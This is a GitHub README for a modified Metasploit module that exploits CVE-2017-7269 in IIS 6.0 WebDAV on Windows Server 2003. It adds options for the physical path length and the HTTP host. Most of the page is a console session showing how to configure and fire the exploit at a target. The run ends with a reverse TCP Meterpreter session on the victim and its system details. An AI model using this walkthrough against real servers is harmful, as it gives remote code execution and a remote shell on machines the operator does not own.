Skip to content

Latest commit

 

History

History
57 lines (39 loc) · 1.85 KB

README.md

File metadata and controls

57 lines (39 loc) · 1.85 KB

fixed msf module for cve-2017-7269

fix not work when length of physical path not equal to 19,or has a host binding.

add options: PhysicalPathLength,HttpHost

for test: host phyiscal path: c:\inetpub\ , length=11

msf > use exploit/windows/iis/cve-2017-7269
msf exploit(cve-2017-7269) > show options

Module options (exploit/windows/iis/cve-2017-7269):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   HttpHost            localhost        yes       http host for target
   PhysicalPathLength  19               yes       length of physical path for target(include backslash)
   RHOST                                yes       The target address
   RPORT               80               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2


msf exploit(cve-2017-7269) > set rhost 192.168.223.130
rhost => 192.168.223.130
msf exploit(cve-2017-7269) > set rport 8088
rport => 8088
msf exploit(cve-2017-7269) > set physicalpathlength 11
physicalpathlength => 11
msf exploit(cve-2017-7269) > set httphost zcgonvh-test.com
httphost => zcgonvh-test.com
msf exploit(cve-2017-7269) > exploit

[*] Started reverse TCP handler on 192.168.223.129:4444 
[*] Sending stage (957487 bytes) to 192.168.223.130
[*] Meterpreter session 1 opened (192.168.223.129:4444 -> 192.168.223.130:1135) at 2017-03-30 18:13:41 -0400

meterpreter > sysinfo
Computer        : ZCG-AA4B4E60208
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter >